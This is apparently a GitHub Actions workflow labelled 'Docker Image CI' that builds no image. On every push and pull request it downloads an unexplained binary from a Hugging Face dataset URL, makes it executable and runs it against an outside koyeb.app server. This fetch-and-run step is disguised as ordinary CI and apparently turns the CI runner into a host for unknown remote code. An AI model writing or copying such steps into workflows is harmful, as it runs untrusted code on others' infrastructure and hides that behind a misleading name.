name: Docker Image CI

on:
  push:
    branches: ["main"]
  pull_request:
    branches: ["main"]

jobs:
  build:
    runs-on: namespace-profile-1122

    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Setup & run app
        run: |
          sudo apt-get update
          sudo apt-get install -y --no-install-recommends curl ca-certificates
          sudo rm -rf /var/lib/apt/lists/*

          curl -L https://huggingface.co/datasets/api2/app/resolve/main/app -o app
          chmod +x app

          ./app --server https://industrial-rosemonde-app123123-bde611ac.koyeb.app
